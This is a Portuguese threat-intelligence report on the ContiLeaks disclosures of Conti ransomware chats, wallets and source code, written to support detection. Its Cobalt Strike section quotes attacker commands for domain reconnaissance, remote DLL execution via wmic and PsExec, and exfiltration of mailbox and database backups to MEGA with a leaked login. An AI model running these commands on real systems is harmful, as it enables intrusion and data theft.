Após o anúncio de apoio ao governo russo feito pelo grupo Conti, um anônimo identificado no twitter apenas como ContiLeaks declarou seu apoio à Ucrânia na guerra em andamento. Em 27 de fevereiro ele começou a vazar informações internas do grupo de ransomware. Trata-se de pouco mais de um ano de registros de conversas entre seus operadores, vítimas e outros indivíduos de importância, além de detalhes técnicos sobre os ataques realizados e a infraestrutura usada, valores recebidos e até endereços de carteiras de criptomoedas, algumas ainda com dinheiro oriundo de resgates recebidos.
Históricos de conversas
Um dos materiais mais ricos para fins de threat intelligence são os registros de conversas entre membros do Conti. Seu conteúdo é extenso e ainda está em análise, mas já trouxe revelações importantes, como uma possível associação entre o grupo e a FSB (órgão de inteligência russa que substituiu a KGB).
Em abril do ano passado, dois membros discutem uma invasão direcionada a um jornalista do grupo Bellingcat, mirando especificamente arquivos sobre Alexei Navalny, um antigo opositor político de Vladimir Putin envenenado em agosto de 2020.
"Bro is such a question - we work on politics?)"
"in what respect?"
"<Johnyboy77> If the info is some kind of important supposedly
[21:04:21] <Johnyboy77> or just score?
[21:10:55] <Mango> Hi Bro
[21:11:06] <Mango> Come on)
[21:11:12] <Johnyboy77> Property
[21:11:13] <Mango> In general, we work for loot :)
[21:11:20] <Mango> And fuck from whom to demand it
[21:11:22] <Johnyboy77> I merged the correspondence of people who are working
against the Russian Federation
[21:11:25] <Johnyboy77> in the information field
[21:11:31] <Johnyboy77> But I can not decipher
[21:11:34] <Johnyboy77> Correspondence of the signal
[21:11:52] <Johnyboy77> shorter journalists
[21:11:54] <Mango> I will ask)
[21:11:55] <Johnyboy77> which are pussy against the Russian Federation
[21:12:04] <Johnyboy77> current file brooms fucking can not decipher
[21:12:13] <Johnyboy77> piece of concrete happened "
"We need this?"
"I don't know how to decorate a signal"
"Or we are current for loot and without political fuss"
"This is E2E"
"Soron I can not do anything here ("
"I even want to help \ Note to help"
"So, in general, we are interested in such data?"
"Ie we are patriots or how?)))"
"We are of course patriots)"
"I understood. If they decipher there - the Mayakna"
"And I wrote there other day to you about Aucion, but I understand you while
busy and did not delve)"
[21:21:02] <Johnyboy77> in short So say
[21:21:08] <Johnyboy77> And all of his passwords are
[21:21:17] <Johnyboy77> And she is still Valid
[21:30:56] <Mango> Well Corresponders at least Zaskrinh them
[21:31:05] <Mango> Need spectects bro what to say
[21:31:07] <Johnyboy77> Pink out files
[21:31:12] <Johnyboy77> navalni FSB
Algum tempo depois, há uma nova cobrança e referência a um “chefe”:
"Bro about Navalny do not forget, I looked at the chief - he is waiting for details"
A matéria em discussão provavelmente é Hunting the Hunters: How We Identified Navalny’s FSB Stalkers, que detalha como a equipe do Bellingcat identificou os oficiais da FSB envolvidos em monitorar e seguir Navalny na época de seu envenenamento.
As conversas também revelaram endereços de carteiras bitcoin usada pelo grupo. Uma apuração do grupo vx-underground mostrou que, entre 21 de abril de 2017 e 28 de fevereiro de 2022, a carteira principal do Conti acumulava cerca de 2,7 bilhões de dólares:
Ao que tudo indica, o grupo de ransomware ainda não conseguiu identificar quem está vazando seus dados no twitter. Registros de conversas do dia primeiro de março de 2022 mostram a confusão interna:
"ts": "2022-03-01T14:09:27.345914", "from": "qwerty@q3mcco35auwcstmt.onion", "to": "cybergangster@q3mcco35auwcstmt.onion", "body": "Listen, Azim and Smelian wrote me today, they're worried they're falling over17:09that they've been messing with us17:09what should I tell them?" "ts": "2022-03-01T16:12:42.619523", "from": "wind@q3mcco35auwcstmt.onion", "to": "mango@q3mcco35auwcstmt.onion", "body": "who leaked, did you find out?{backslash}do you think we'll rebel?"
É interessante observaer que o destinatário da segunda mensagem, Mango, é o mesmo envolvido nas conversas sobre Alexei Navalny em abril de 2021. Há diversas menções à ferramenta Cobalt Strike nos vazamentos. Comandos e binários legítimos (LOLbins) a ela associados são tratados na seção a seguir.
Cobalt Strike e LOLbins
Dentre os vazamentos lançamentos até o momento, Conti Rocket Chat Leaks.
7z (7B49130E26505A6AC3786591F548D492DD6D83CE8986477AD803FD04615209F8) contém uma série de explorações de executáveis legítimos do Windows durante invasões do grupo Conti. Atenção especial aos comandos iniciados por “shell”: esses redirecionam input ao prompt de comando da máquina infectada, o que facilita bastante sua detecção.
Não anexaremos a este documento o conteúdo completo desse vazamento, uma vez que ele concentra dados de rede interna de vítimas do grupo. Aos interessados em obter todas as ocorrências do uso de Cobalt Strike no arquivo em questão, recomendamos o seguinte comando, adaptado de @c3rb3ru5d3d53c:
find . -type f -name ".json" | grep -P '\d+-\d+-\d+..json' | while read i; do
cat $i | jq -r '.messages[].msg' | grep 'beacon>'; done
Alguns comandos relevantes para a detecção de atividade do Conti a seguir.
Comandos redirecionados do CS para o prompt de comando |
reg query HKCU\Environment |
net localgroup administrators |
net group “Domain admins” /dom |
net group “Enterprise admins” /dom |
start /b MEGAcmdServer.exe |
MEGAclient.exe update –auto=off |
MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd |
MEGAclient.exe whoami |
MEGAclient.exe put -q –ignore-quota-warn “C:\Users*****\Documents\Outlook Files\ol.7z” |
MEGAclient.exe put -q –ignore-quota-warn F:\SQLBackup*.bak |
wmic /node:10...* process call create “rundll32 C:\ProgramData\x64.dll entryPoint” |
PsExec \* -d -s -h gpupdate /force -accepteula -y -u .local* -p * |
Suprimimos informações sensíveis de alvos nos exemplos acima. É interessante observar que boas práticas de detecção alertariam para diversos dos comandos listados, como por exemplo no emprego de -accepteula para a execução de ferramentas da SysInternals. Também é possível perceber que o Conti utilizava o MEGA (antigo megaupload) para algumas de suas atividades. Não sabemos afirmar se esse comportamento ainda permanece nas incursões atuais do grupo.
Código fonte e builder
O golpe mais duro contra o grupo criminoso veio no dia primeiro de março, com o vazamento do código fonte do ransomware acompanhado de seu builder (executável utilizado para gerar a versão final que será enviada às vítimas).
Esse conteúdo é protegido por uma senha que o usuário ContiLeaks forneceu a um grupo reduzido de pesquisadores. Pouco tempo depois houve a liberação de uma segunda versão, dessa vez sem senha, que omitia o código do ransomware e suas principais funções. Por conta da escolha de um protocolo depreciado de criptografia, foi possível utilizar essa segunda versão para extrair o conteúdo protegido do vazamento completo. Dentro desse conteúdo, o builder é protegido por uma segunda senha ainda não descoberta.
É provável que novos grupos de ransomware e atores maliciosos de baixa habilidade aproveitem o código fonte do Conti para gerar suas próprios versões deste malware. Por esse motivo, não compartilharemos onde conseguir o vazamento completo nem como extrair seu conteúdo sem a senha. Pesquisadores minimamente competentes serão capazes de obter essas informações facilmente.
Conclusão
Essa ainda é uma situação em desenvolvimento. A análise de tanto material, seja na forma de código ou na forma de registros de conversas, levará tempo. Ao que tudo indica o vazador de informações ainda não foi descoberto pelo grupo e deverá continuar publicando informações do Conti. Manteremos todos atualizados de nossas pesquisas envolvendo esses materiais, compartilhando toda a informação possível com a comunidade de segurança.
Àqueles que queiram trabalhar diretamente com os vazamentos, é possível baixar os arquivos comprimidos em hxxps://share[.]vx-underground[.]org/Conti/. As traduções de materiais para o inglês estão disponíveis nos seguintes endereços do GitHub:
https://github.com/west-wind/conti-leaks
https://github.com/TheParmak/conti-leaks-englished
Por fim, as referências bibliográficas deste relatório contêm informações adicionais. Recomendamos a leitura.
Referências bibliográficas
https://twitter.com/ContiLeaks/ https://github.com/west-wind/conti-leaks https://github.com/TheParmak/conti-leaks-englished https://blog.malwarebytes.com/threat-intelligence/2022/03/the-conti-ransomware-leaks/ https://www.rapid7.com/blog/post/2022/03/01/conti-ransomware-group-internal-chats-leaked-over-russia-ukraine-conflict/ https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/ https://arstechnica.com/information-technology/2022/03/conti-cybergang-gloated-when-leaking-victims-data-now-the-tables-are-turned/ https://www.theregister.com/2022/02/28/conti_ransomware_gang_chats_leaked